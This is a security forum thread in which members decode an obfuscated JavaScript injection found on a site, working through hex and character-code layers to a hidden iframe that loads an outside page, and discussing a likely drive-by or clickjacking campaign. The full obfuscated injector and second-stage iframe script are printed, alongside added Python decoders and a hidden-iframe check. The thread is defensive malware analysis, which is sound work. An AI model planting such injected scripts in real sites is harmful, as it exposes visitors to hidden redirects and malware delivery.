Decode Urgent Help Needed

    • #4068
      Dark_Knight
      Participant

      I need some help here. Anybody have an idea what this does?
      3364253334253337253330253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c26z3d+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c26z3d+'2536642536352533652729293B7D7661'+c26z3d+'72206D796961'+c26z3d+'3D747275653B3C2F7363726970743E';r5bb5e1df0.write(r3a5450e3d81(reeaa475ea65));

      How could I decode this?

    • #25850
      alan
      Participant

      how far have you gotten?

      putting this portion into

      3D747275653B3C2F7363726970743E

      hex 2 ascii gives

      =true;

      which looks reasonable! But I get stuck there!

    • #25851
      Dark_Knight
      Participant

      I initially tried the hex to ASCII but had no luck. I will give it another shot.

    • #25852
      alan
      Participant

      I think you could be missing a good portion of it. I've sent you a private message which may or may not be relevant.

    • #25853
      Jhaddix
      Participant

      By first impressions I'd say it's an XSS attack... a full decode would be required.

    • #25854
      Dark_Knight
      Participant

      Thanks for all the help guys. I appreciate it.

    • #25855
      Ketchup
      Participant

      The rough translation is this:

      style='visibility:hidden'>'));}var myia=true; r5bb5e1df0.write(r3a5450e3d81(reeaa475ea65));

      You are indeed missing a good portion of it.  I would agree with Jhaddix in that it is likely part of an XSS attack.

    • #25856
      UNIX
      Participant

      I too would say, that a part is missing. Do you have the rest of it or were you just asking to get an idea what this could be?

    • #25857
      Jhaddix
      Participant

      Ketchup's decode makes me think it's a clickjacking attack, injected via XSS.

    • #25858
      Dark_Knight
      Participant

      c26z634='';r28bd46b6=document;r28bd46b6.write('function r4373bbe(r52973acb7a){return ev'+c26z634+'al(r52973acb7a); }');  function c26e34eb22refb13(re3c3827f47){ function r8157f3fa362(){var r99011=16;return r99011;} var zf4='';return (r4373bbe('parseI'+zf4+'nt')(re3c3827f47,r8157f3fa362()));}function r3cf3d(rcba5aab2){ function r2554044(){var rc0ee24fd3=2;return rc0ee24fd3;} var r3ff7d7403c7='';r17e8d5766='fromCh';r26431=String[r17e8d5766+'arCode'];for(r7bb6b022=0;r7bb6b022<rcba5aab2.length;r7bb6b022+=r2554044()){ r3ff7d7403c7+=(r26431(c26e34eb22refb13(rcba5aab2.substr(r7bb6b022,r2554044()))));}return r3ff7d7403c7;} var r6671d26afb='3C7363726970743E69662821'+c26z634+'6D796961'+c26z634+'297B646F63756D656E742E777269746528756E65736361'+c26z634+'7065282027253363253639253636253732253631'+c26z634+'253664253635253230253665253631'+c26z634+'253664253635253364253633253332253336253230253733253732253633253364253237253638253734253734253730253361'+c26z634+'253266253266253737253737253737253265253631'+c26z634+'253732253665253638253635253664253264253634253639253631'+c26z634+'253664253631'+c26z634+'253665253734253265253665253663253266253366253237253262253464253631'+c26z634+'253734253638253265253732253666253735253665253634253238253464253631'+c26z634+'253734253638253265253732253631'+c26z634+'253665253634253666253664253238253239253261'+c26z634+'253331'+c26z634+'253330253339253339253330253338253239253262253237253330253635253339253332253335253632253237253230253737253639253634253734253638253364253336253333253339253230253638253635253639253637253638253734253364253331'+c26z634+'253337253332253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c26z634+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c26z634+'2536642536352533652729293B7D7661'+c26z634+'72206D796961'+c26z634+'3D747275653B3C2F7363726970743E';r28bd46b6.write(r3cf3d(r6671d26afb));check_content()

      if(!myia){document.write(unescape
           
      =true;
      ));}va

      That's what I have so far. Apparently they go from hex to ASCII and then ASCII to binary.

    • #25859
      Ketchup
      Participant

      Well, they are obscuring the code a bit.  It’s pretty common for goofy variable and function names to be used, like r58ss8a2, for example.  I cleaned up the code a little bit.  It looks like you are still missing some portion of it, although I doubt it is necessary.  The attack vector looks like a hidden IFRAME.


      spacer='';
      doc=document;
      // Builds the word "eval" from two halves so it never appears literally in the source.
      doc.write('function unknown_function1(unknown_var1){return ev'+spacer+'al(unknown_var1); }');

      // parseInt(arg, 16), with the function name assembled from pieces as well.
      function function1(func1_arg1)
      {
        function setvar1()
        {
          var var1=16;
          return var1;
        }
        var spacer2='';
        return (unknown_function1('parseI'+spacer2+'nt')(func1_arg1,setvar1()));
      }

      // Walks the hex string two characters at a time: String.fromCharCode(parseInt(pair,16)).
      function function2(func2_arg1)
      {
        function setvar2()
        {
          var var2=2;
          return var2;
        }
        var return_string='';
        string1='fromCh';
        string2=String[string1+'arCode'];
        for(i=0;i<func2_arg1.length;i+=setvar2())
        {
          return_string+=(string2(function1(func2_arg1.substr(i,setvar2()))));
        }
        return return_string;
      }

      var attack_vector='3C7363726970743E69662821' +spacer+ '6D796961' +spacer+ '297B646F63756D656E742E777269746528756E65736361' +spacer+ '7065282027253363253639253636253732253631' +spacer+ '253664253635253230253665253631' +spacer+ '253664253635253364253633253332253336253230253733253732253633253364253237253638253734253734253730253361' +spacer+ '253266253266253737253737253737253265253631' +spacer+ '253732253665253638253635253664253264253634253639253631' +spacer+ '253664253631' +spacer+ '253665253734253265253665253663253266253366253237253262253464253631' +spacer+ '253734253638253265253732253666253735253665253634253238253464253631' +spacer+ '253734253638253265253732253631' +spacer+ '253665253634253666253664253238253239253261' +spacer+ '253331' +spacer+ '253330253339253339253330253338253239253262253237253330253635253339253332253335253632253237253230253737253639253634253734253638253364253336253333253339253230253638253635253639253637253638253734253364253331' +spacer+ '253337253332253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361' +spacer+ '253638253639253634253634253635253665253237253365253363253266253639253636253732253631' +spacer+ '2536642536352533652729293B7D7661' +spacer+ '72206D796961' +spacer+ '3D747275653B3C2F7363726970743E';

      // What function2(attack_vector) decodes to; the %XX-encoded unescape() argument (the iframe) is elided here.
      if(!myia)
      {
        document.write(unescape( "''"));
      }
      var myia=true;

      document.write(function2(attack_vector));
      check_content()
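      The following is an added example, not code from this thread: a static Python decoder for the two layers alan and Ketchup describe. Layer 1 is the hex string broken up with `'+c26z634+'` joins (the spacer is an empty string) and rebuilt as `String.fromCharCode(parseInt(pair,16))`; layer 2 is the `%XX` string that the decoded script hands to `unescape()`. The sample blob is constructed from the first and last chunks of the blob posted above with the long iframe body shortened to `%3c%69%66%72%61%6d%65%3e` (`<iframe>`); the variable name `c26z634` is the one on the page. Nothing is evaluated; the encodings are only reversed.

```python
"""Static decoder for the layered obfuscation discussed in this thread.

Layer 1: a hex string split by '+spacer+' joins, rebuilt two characters at a
time with parseInt(pair, 16) -> String.fromCharCode.
Layer 2: the resulting script calls unescape() on a %XX-encoded string, which
is the markup actually written into the page.
"""
import re
from typing import List
from urllib.parse import unquote

# '+spacer+' concatenations used to break up the hex literal (spacer == '').
JOIN_RE = re.compile(r"'\s*\+\s*[A-Za-z_$][\w$]*\s*\+\s*'")
# A run of %XX escapes, i.e. what the script hands to unescape().
PERCENT_RUN_RE = re.compile(r"(?:%[0-9A-Fa-f]{2})+")

# Constructed sample: opening and closing chunks of the blob posted in this
# thread, with the iframe body shortened to "%3c%69%66%72%61%6d%65%3e" and one
# line-wrap space left in to show that it is tolerated.
SAMPLE_BLOB = (
    "'3C7363726970743E69662821'+c26z634+'6D796961'+c26z634+"
    "'297B646F63756D656E742E777269746528756 E65736361'+c26z634+"
    "'7065282027253363253639253636253732253631'+c26z634+"
    "'2536642536352533652729293B7D7661'+c26z634+'72206D796961'+c26z634+"
    "'3D747275653B3C2F7363726970743E'"
)


def strip_joins(blob: str) -> str:
    """Remove the '+spacer+' joins, wrap whitespace and the outer quotes."""
    blob = JOIN_RE.sub("", blob)
    blob = re.sub(r"\s+", "", blob)
    return blob.strip("'\"")


def hex_to_text(hex_blob: str) -> str:
    """Layer 1: every pair of hex digits becomes one character."""
    if len(hex_blob) % 2 or not re.fullmatch(r"[0-9A-Fa-f]*", hex_blob):
        raise ValueError("not an even-length hex string")
    return bytes.fromhex(hex_blob).decode("latin-1")


def percent_decode(text: str) -> str:
    """Layer 2: decode every %XX run the way JavaScript unescape() would."""
    return PERCENT_RUN_RE.sub(lambda m: unquote(m.group(0), encoding="latin-1"), text)


def decode_layers(blob: str, max_depth: int = 5) -> List[str]:
    """Return every intermediate stage, stopping when decoding changes nothing."""
    stages = [hex_to_text(strip_joins(blob))]
    for _ in range(max_depth):
        nxt = percent_decode(stages[-1])
        if nxt == stages[-1]:
            break
        stages.append(nxt)
    return stages


if __name__ == "__main__":
    for depth, stage in enumerate(decode_layers(SAMPLE_BLOB)):
        print(f"layer {depth}: {stage}")
```

      To use it on the full blob from the post above, paste the whole `r6671d26afb` literal (joins and all) as the argument to `decode_layers`; the last stage is the markup the script writes, and the `src` of the iframe in it is the indicator worth blocking.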
    • #25860
      Dark_Knight
      Participant

      Guys, the help is GREATLY appreciated. So this looks like an XSS attack, maybe, as mentioned previously?

    • #25861
      Ketchup
      Participant

      Yep, I am not sure exactly what that link is doing, but I am not brave enough to find out 🙂

    • #25862
      Ketchup
      Participant

      Here is what I pulled from the site referenced in the script.  I took the liberty of translating some of the code to make it more readable. 

      This is interesting.  I will let you know if I find anything else.



      var filler1 = "lRusrktXDJJYrvSgerej";
      var filler2 = "OsFFoXlSOQCXadLJskRb";
      var filler3 = "jEfJhqTablBNAwUHCnrO";

      // Character codes in decimal, separated by the letter "z".
      // ("shellcode?" in the original post; renamed to a valid identifier.)
      var maybe_shellcode = "z60z105z102z114z97z109z101z32z119z105z100z116z104z61z34z52z56z48z34z32z104z101z105z103z104z116z61z34z54z48z34z32z115z114z99z61z34z104z116z116z112z58z47z47z119z119z119z46z103z97z114z100z101z110z45z97z114z116z46z103z114z47z34z32z115z116z121z108z101z61z34z98z111z114z100z101z114z58z48z112z120z59z32z112z111z115z105z116z105z111z110z58z114z101z108z97z116z105z118z101z59z32z116z111z112z58z48z112z120z59z32z108z101z102z116z58z45z53z48z48z112z120z59z32z111z112z97z99z105z116z121z58z48z59z32z102z105z108z116z101z114z58z112z114z111z103z105z100z58z68z88z73z109z97z103z101z84z114z97z110z115z102z111z114z109z46z77z105z99z114z111z115z111z102z116z46z65z108z112z104z97z40z111z112z97z99z105z116z121z61z48z41z59z32z45z109z111z122z45z111z112z97z99z105z116z121z58z48z34z62z60z47z105z102z114z97z109z101z62";

      var filler4 = "mgpmcKufxlumukVYGnvu";
      var filler5 = "FyzziVYoJTjQuBufAdRA";
      var filler6 = "cUHXVBCVfUWXBJKmVWmB";

      var array_var1 = maybe_shellcode.split("z");

      var filler7 = "EMwGVHsrdesOdfMoCHhk";
      var filler8 = "sQVVvhKypribJcOSEVUP";
      var filler9 = "gaVqDjIHFcWYXCCoEMiV";

      var string_var1 = "";

      var filler10 = "GmndopStCBOxlsqrCdDA";
      var filler11 = "jWjVPaMREQRNXxbGzyyf";
      var filler12 = "zAvXyXdyVbdHfvSeerMv";

      // array_var1[0] is "" because the string starts with "z", hence i starts at 1.
      for (var i=1; i<array_var1.length; i++)
      {
        string_var1+=String.fromCharCode(array_var1[i]);
      }
      try
      {
        document.write(string_var1);
      }
      catch(e)
      {
      }

      var filler13 = "cEtIzLmeDzZbgWDQoxfq";
      var filler14 = "nQFUmJkbGQRhsImNXTyo";
      var filler15 = "fosYxelUyjIaDpPnYRyu";

      check_content()
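      The following is an added example, not Ketchup's code: a Python decoder for this third stage (decimal character codes separated by the letter "z", rebuilt with `String.fromCharCode`) followed by a check of whether the resulting iframe is styled to be invisible. The page's own string decodes to an iframe styled with `position:relative; left:-500px; opacity:0` and the IE `Alpha(opacity=0)` filter, so those are the fragments the check looks for. The sample is constructed: the page's own opening (`<iframe width="480"`) followed by a hand-encoded `src="http://example.invalid/"` and `style="opacity:0"`. Nothing is fetched or evaluated.

```python
"""Decoder for "z"-delimited decimal character codes plus a hidden-iframe check."""
import re
from typing import Dict

# Constructed sample: the thread's own prefix (<iframe width="480") followed by
# a hand-encoded src="http://example.invalid/" and style="opacity:0".
SAMPLE_Z = (
    "z60z105z102z114z97z109z101z32z119z105z100z116z104z61z34z52z56z48z34"
    "z32z115z114z99z61z34z104z116z116z112z58z47z47"
    "z101z120z97z109z112z108z101z46z105z110z118z97z108z105z100z47z34"
    "z32z115z116z121z108z101z61z34z111z112z97z99z105z116z121z58z48z34z62"
    "z60z47z105z102z114z97z109z101z62"
)

ATTR_RE = re.compile(r'([A-Za-z-]+)\s*=\s*"([^"]*)"')

# Style fragments seen in the thread's decoded iframe (opacity:0, left:-500px,
# the IE Alpha filter) plus the usual display/visibility tricks.
HIDDEN_STYLE_RE = re.compile(
    r"opacity\s*:\s*0(?![.\d])|visibility\s*:\s*hidden|display\s*:\s*none"
    r"|(?:left|top)\s*:\s*-\d+px|alpha\(opacity=0\)",
    re.IGNORECASE,
)


def decode_z(encoded: str, sep: str = "z") -> str:
    """Split on the separator and map each decimal code to its character.

    split() yields a leading "" because the string starts with the separator;
    that is why the original script's loop starts at index 1.
    """
    return "".join(chr(int(code)) for code in encoded.split(sep) if code)


def iframe_attrs(markup: str) -> Dict[str, str]:
    """Return the attributes of the first <iframe> tag, lower-cased names."""
    m = re.search(r"<iframe\b([^>]*)>", markup, re.IGNORECASE)
    if not m:
        return {}
    return {name.lower(): value for name, value in ATTR_RE.findall(m.group(1))}


def is_hidden_iframe(attrs: Dict[str, str]) -> bool:
    """True when the iframe is styled off-screen/transparent or is 0-1 px in size."""
    style = attrs.get("style", "")
    tiny = attrs.get("width", "") in ("0", "1") or attrs.get("height", "") in ("0", "1")
    return bool(HIDDEN_STYLE_RE.search(style)) or tiny


if __name__ == "__main__":
    markup = decode_z(SAMPLE_Z)
    attrs = iframe_attrs(markup)
    print(markup)
    print("src:", attrs.get("src"), "hidden:", is_hidden_iframe(attrs))
```

      Run against the page's own string, `decode_z` gives the iframe whose `src` is the next hop Ketchup followed; `is_hidden_iframe` flags it from the `left:-500px` and `opacity:0` styling, which is the signal to look for in injected markup.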
    • #25863
      Ketchup
      Participant

      LOL, that's not shellcode.  I was over-analyzing it.   It's just another iframe:

      I traced it through a couple more sites, and I am stuck here:

      The hash value being passed to that URL seems to be some sort of authentication hash (md5).  I am guessing this one is either not valid or is disabled because I am not getting anything from this page.  If you alter the parameter or delete it, you get plain text on the page that resembles BASE64 encoding.  The BASE64 text varies depending on how you alter the parameter.  It doesn’t appear to translate to anything readable, at least not in English.

    • #25864
      Jhaddix
      Participant

      I saw hashing like that used to back-scan for successfully compromised hosts (I think) in a presentation from Valsmith.

      Lifecycle is:

      1) use an automated tool to scan the net for potentially vulnerable sites

      2) tool attempts to inject iframes via xss or sqli to all targets. purpose? to clickjack to a referrer site that pays for clicks, or iframe is used to redirect to hosted site to deploy more malware and harvest bots.

      3) same automated tool scans pages for hash values to see which targets the attacks worked on.

      profit…

    • #25865
      Ketchup
      Participant

      JHaddix,

      It’s possible that the last page is some sort of confirmation / logging page.  What’s interesting though, is that a couple of the IFRAME jumps pass no parameters at all.  I wasn’t tracking cookies as I was going through the code, so it’s quite possible that the compromised host information is in a cookie.

      It could be that if the hash value is incorrect, the page displays an error message encoded in BASE64.  Again, though, I can't seem to translate it to English.  I am posting an example below.  This is indeed very interesting.

      I doubt that we will know exactly what's going on unless we get access to the PHP code of the final jump.  Interestingly enough, this potentially last jump is on a box hosted in the US, while the others are elsewhere in the world.

      http://samspade.org/whois/ddosguard.info

      One of the BASE64 messages from the last jump point:

      0xKAJ/ZbK0/nO2UabGOYZKFPE9WFocXlMEVwUW/jO/rR93gNZPnsqTcPyOVDiEt07gmqHYtSpc1BRoYPqRddPOTVrnYsPI3ObwRLscAXCf+vEwFgg0na7NaW+3zfEHlD13VTvU9mx3dXjzSzDU4fbRs26rsJ3XHGMXILscxUvYIxDCapRvthq47f/H/OMs7sTQt2DCKq9IphIGsCMu6M+eER4wRpDk7javZRRO97U68kENX2VBsUJwP/KItQvx7nbkuV9N2PKPvzUUyVZhLiPpnecTXQjLVCwli/HnoQ6krif+BYRfbY4lDsFPswLea6AfjpW33BET4idzNWquGmbzE2ylCSN8pvHOobXaImpCamtyAuqAUNaLqaLMor20JPa+K39yHmcVEme4MpE0ThSUpzFvnm4xjL8XCqeA32q357rLnMEuZ6tedZgjRfnH8zoB0H15ZOOgiRAHGVDDubR8XCvF2VSECT+4J+Iqj6HPJjYO0wJKiqo3eXBR+TcTqw1v0po6G+zgGC4L1VZoyA0308qr1Rx0bgLS/LIjX4j3MmNTOrubKJDInGh9eZImMTL7R3ZMU3/P5r3f2itRkfep0LkdwqgqMztkWgbP0i7GF7ZHpvjo57bIMdd2j/iwNJw56DiP3f8H9W+gXu7njHc3KyY4BqA4gz5B1aEw0HiP3aGIK4VSPYHULvrPkHXjWuZtclDLX52sJ6aMxZN2l1czKh+t4sallKAtSk8Gj7r+1IEqBcQnFT8dCipyKFaj+w3XCpWVWtPKkviMSRP80+MAUsqeaGyNIZ6xkR7OWusRquK9NK7x5rMF0JGQ==
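      The following is an added example, not from the thread: a small Python triage helper for the base64-looking text Ketchup describes. It strips line-wrap whitespace, decodes, and reports whether the bytes look like readable text or like an opaque blob (compressed, encrypted or binary), which is the usual reason a "BASE64 message" will not translate to anything readable in any language. The two samples are constructed; to test the blob above, paste it in with the whitespace removed (the copy on this page may have lost characters in extraction, in which case the helper reports it as not valid base64 rather than guessing).

```python
"""Triage for base64-looking text: is the payload readable text or an opaque blob?"""
import base64
import binascii
import math
import string
from typing import Dict

PRINTABLE = frozenset(string.printable.encode("ascii"))


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: roughly 4-5 for English text, close to 8 for ciphertext."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in (data.count(b) for b in set(data)))


def triage_base64(text: str) -> Dict[str, object]:
    """Decode (tolerating line-wrap whitespace) and classify the decoded bytes."""
    compact = "".join(text.split())
    try:
        raw = base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return {"valid_base64": False}
    printable = (sum(1 for b in raw if b in PRINTABLE) / len(raw)) if raw else 0.0
    entropy = shannon_entropy(raw)
    # Readable text is almost entirely printable and well below 6 bits/byte;
    # anything else is treated as opaque (compressed, encrypted or binary).
    verdict = "text" if printable > 0.95 and entropy < 6.0 else "opaque"
    return {
        "valid_base64": True,
        "length": len(raw),
        "printable_ratio": printable,
        "entropy_bits": entropy,
        "verdict": verdict,
    }


# Constructed samples: an English sentence and every byte value once.
TEXT_SAMPLE = base64.b64encode(
    b"This is an ordinary English error message from the server."
).decode("ascii")
OPAQUE_SAMPLE = base64.b64encode(bytes(range(256))).decode("ascii")

if __name__ == "__main__":
    for label, sample in (("text", TEXT_SAMPLE), ("opaque", OPAQUE_SAMPLE)):
        print(label, triage_base64(sample))
```

      A verdict of "opaque" with entropy near 8 bits/byte is what you would expect from an encrypted or compressed response, which fits Ketchup's observation that the output changes with the parameter yet never becomes readable.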

Copyright ©2021 Caendra, Inc.